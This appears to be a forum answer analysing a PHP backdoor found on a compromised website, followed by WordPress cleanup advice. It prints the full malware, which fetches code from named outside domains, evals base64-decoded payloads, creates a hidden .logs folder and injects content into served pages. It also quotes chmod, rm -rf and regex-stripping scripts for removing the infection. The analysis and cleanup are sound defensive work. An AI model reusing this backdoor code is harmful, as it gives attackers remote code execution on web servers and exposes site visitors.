if (! function_exists('mrobh')) {
function get_tds_777 ($url)
{
$content = "";
$content = #trycurl_777($url);
if ($content !== false)
return $content;
$content = #tryfile_777($url);
if ($content !== false)
return $content;
$content = #tryfopen_777($url);
if ($content !== false)
return $content;
$content = #tryfsockopen_777($url);
if ($content !== false)
return $content;
$content = #trysocket_777($url);
if ($content !== false)
return $content;
return '';
}
function trycurl_777 ($url)
{
if (function_exists('curl_init') === false)
return false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_HEADER, 0);
$result = curl_exec($ch);
curl_close($ch);
if ($result == "")
return false;
return $result;
}
function tryfile_777 ($url)
{
if (function_exists('file') === false)
return false;
$inc = #file($url);
$buf = #implode('', $inc);
if ($buf == "")
return false;
return $buf;
}
function tryfopen_777 ($url)
{
if (function_exists('fopen') === false)
return false;
$buf = '';
$f = #fopen($url, 'r');
if ($f) {
while (! feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
} else
return false;
if ($buf == "")
return false;
return $buf;
}
function tryfsockopen_777 ($url)
{
if (function_exists('fsockopen') === false)
return false;
$p = #parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$f = #fsockopen($host, 80, $errno, $errstr, 30);
if (! $f)
return false;
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
fwrite($f, $request);
$buf = '';
while (! feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
if ($buf == "")
return false;
list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10),
$buf);
return $buf;
}
function trysocket_777 ($url)
{
if (function_exists('socket_create') === false)
return false;
$p = #parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$ip1 = #gethostbyname($host);
$ip2 = #long2ip(#ip2long($ip1));
if ($ip1 != $ip2)
return false;
$sock = #socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (! #socket_connect($sock, $ip1, 80)) {
#socket_close($sock);
return false;
}
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
socket_write($sock, $request);
$buf = '';
while ($t = socket_read($sock, 10000)) {
$buf .= $t;
}
#socket_close($sock);
if ($buf == "")
return false;
list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10),
$buf);
return $buf;
}
function update_tds_file_777 ($tdsfile)
{
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "")
$val = get_tds_777($actual2);
$f = #fopen($tdsfile, "w");
if ($f) {
#fwrite($f, $val);
#fclose($f);
}
if (strstr($val, "|||CODE|||")) {
list ($val, $code) = explode("|||CODE|||", $val);
eval(base64_decode($code));
}
return $val;
}
function get_actual_tds_777 ()
{
$defaultdomain = $_SERVER['s_d1'];
$dir = $_SERVER['s_p1'];
$tdsfile = $dir . "log1.txt";
if (#file_exists($tdsfile)) {
$mtime = #filemtime($tdsfile);
$ctime = time() - $mtime;
if ($ctime > $_SERVER['s_t1']) {
$content = update_tds_file_777($tdsfile);
} else {
$content = #file_get_contents($tdsfile);
}
} else {
$content = update_tds_file_777($tdsfile);
}
$tds = #explode("\n", $content);
$c = #count($tds) + 0;
$url = $defaultdomain;
if ($c > 1) {
$url = trim($tds[mt_rand(0, $c - 2)]);
}
return $url;
}
function is_mac_777 ($ua)
{
$mac = 0;
if (stristr($ua, "mac") || stristr($ua, "safari"))
if ((! stristr($ua, "windows")) && (! stristr($ua, "iphone")))
$mac = 1;
return $mac;
}
function is_msie_777 ($ua)
{
$msie = 0;
if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") ||
stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
$msie = 1;
return $msie;
}
function setup_globals_777 ()
{
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
$bot = 0;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
$bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google"))
$bot = 1;
$msie = 0;
if (is_msie_777($ua))
$msie = 1;
$mac = 0;
if (is_mac_777($ua))
$mac = 1;
if (($msie == 0) && ($mac == 0))
$bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
$d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" .
urlencode($_SERVER["PHP_SELF"]) . "&a=" .
urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
$_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
$_SERVER['s_script'] = "mm.php?d=1";
}
if (! function_exists('gml_777')) {
function gml_777 ()
{
$r_string_777 = '';
if ($_SERVER['s_b1'] == 0)
$r_string_777 = '';
return $r_string_777;
}
}
if (! function_exists('gzdecodeit')) {
function gzdecodeit ($decode)
{
$t = #ord(#substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = #unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
}
if ($t & 8) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 16) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 2) {
$start += 2;
}
$ret = #gzinflate(#substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
}
return $ret;
}
}
function mrobh ($content)
{
#Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\<\/body/si', $decoded_content)) {
return preg_replace('/(\<\/body[^\>]*\>)/si',
gml_777() . "\n" . '$1', $decoded_content);
} else {
return $decoded_content . gml_777();
}
}
}
}
Looks like it creates a hidden .log folder:
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
Then seems to download code from http://www.lolypopholypop.com/g_load.php and http://sweepstakesandcontestsdo.com/, base64 decodes it, then executes it:
function update_tds_file_777 ($tdsfile)
{
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "")
$val = get_tds_777($actual2);
$f = #fopen($tdsfile, "w");
if ($f) {
#fwrite($f, $val);
#fclose($f);
}
if (strstr($val, "|||CODE|||")) {
list ($val, $code) = explode("|||CODE|||", $val);
eval(base64_decode($code));
}
return $val;
}
So without having to access your server again, they can execute different code.
Dan Hill wrote an article about getting base64 hacked for WordPress installations.
To quote the results of Dan's findings:
The hack I found essentially created a new php file in the uploads folder of Wordpress that allowed remote filesystem control, and then modified the pages being served (every .php file) to include a script tag redirecting visitors to some dodgy sites.
To get rid of the problem, Dan tried the following:
I did this in three stages. First, find any world-writable directories (tsk tsk):
find . -type d -perm -o=w
And make them not world writable:
find . -type d -perm -o=w -print -exec chmod 770 {} \;
Delete all the new files these guys created:
find . -wholename '*wp-content/uploads/*.php' -exec rm -rf {} \;
(In wordpress, the uploads folder shouldn’t contain any PHP)
Stage two, repair all your infected PHP files. I played around using sed and xargs for this, but eventually gave up and wrote a quick ruby script to do the job. Run this run this ruby script from your root directory:
#!/usr/bin/env ruby
Dir.glob('**/*.php').each do|f|
puts f
begin
contents = File.read(f)
contents = contents.gsub(/\<\?php \/\*\*\/ eval\(.*\)\);\?\>/, "")
File.open(f, 'w') {|f| f.write(contents) }
rescue
puts "FILE ERROR"
end
end
The final step is to upgrade all your old, forgotten about Wordpress installs to prevent any other vulnerabilities showing up. The bonus step for good luck is to reset your passwords, especially any MySQL passwords stored in plain text in your wp-config.php file.
Hope Dan's findings help!
For those searching for a non-Ruby fix, here's a PHP version of Dan Hill's code:
<?php
function fileExtension($filename) {
$pathInfo = pathinfo($filename);
return strtolower($pathInfo['extension']);
}
function fixFiles($path) {
$path = str_replace('././', './', $path);
$d = #opendir($path);
if ($d) {
while (($entry = readdir($d)) !== false) {
$baseEntry = $entry;
$entry = str_replace('././', './', $path . '/' . $entry);
if ($baseEntry != '.' && $baseEntry != '..') {
if (is_file($entry)) {
$fe = fileExtension($entry);
if ($fe == 'php') {
$contents = file_get_contents($entry);
$contents = preg_replace("/\<\?php \/\*\*\/ eval\(.*\)\);\?\>/", '', $contents);
$f = fopen($entry, 'w');
fputs($f, $contents);
fclose($f);
echo $entry . '<br>';
flush();
}
}
else if (is_dir($entry)) {
fixFiles($path . '/' . basename($entry));
}
}
}
closedir($d);
}
}
fixFiles('.');
?>